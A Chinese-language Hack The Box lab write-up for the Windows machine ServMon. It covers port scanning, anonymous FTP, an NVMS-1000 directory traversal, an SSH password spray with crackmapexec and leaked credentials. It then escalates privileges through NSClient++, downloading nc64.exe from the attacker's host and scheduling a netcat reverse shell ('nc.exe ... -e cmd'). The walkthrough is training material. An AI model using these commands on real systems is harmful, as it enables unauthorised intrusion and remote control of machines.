【Hack The Box】windows练习-- ServMon
🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年9月7日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-27-22 10:08PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0)
80/tcp open http
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open napster?
8443/tcp open ssl/https-alt
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| workers
|_ jobs
| http-title: NSClient++
把这几个先枚举了,发现啥也干不了
就看ftp因为可以匿名登陆
所以进去看看有没有信息
首先就是两个用户名,然后还有一个密码文件得去找找,但是ftp里刚才也没看到啊
尝试了一下目录遍历,但是啥都没搞出来
于是去谷歌搜了一下这个NVMS-1000
然后搜到了一个目录遍历
整了这么多个密码,做个密码本,用户名本就用那两个人就行
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
crackmapexec ssh 10.129.227.75 -u user.txt -p pass.txt
账号密码如下
nadine / L1k3B1gBut7s@W0rk
登陆之后,先进行内核之类的枚举
然后在这里发现了一个可以的服务,program fils也是必须查看的目录
而且我们在之前看到的那个note中,也能看到相关信息
进去以后,看到了一个ini文件
ini就相当于linux中的config文件,我是这么认为的
然后就发现了一个密码,并且在下面还能看到是只允许本地登陆
是8443
ssh nadine@10.10.10.184 -L 8443:127.0.0.1:8443
iwr http://10.10.14.52:8000/nc64.exe -Outfile C:\Temp\nc.exe
bat脚本编写是这样的
\Temp\nc.exe 10.10.14.13 8888 -e cmd
登陆本地8443,按图配置,value树枝都会上传脚本以及nc,来反弹端口
我们现在将通过在调度程序中添加一个新部分来重复该过程,路径如下 /settings/scheduler 。 现在将 shell 的键和值设置为 interval = 1m 并添加更改。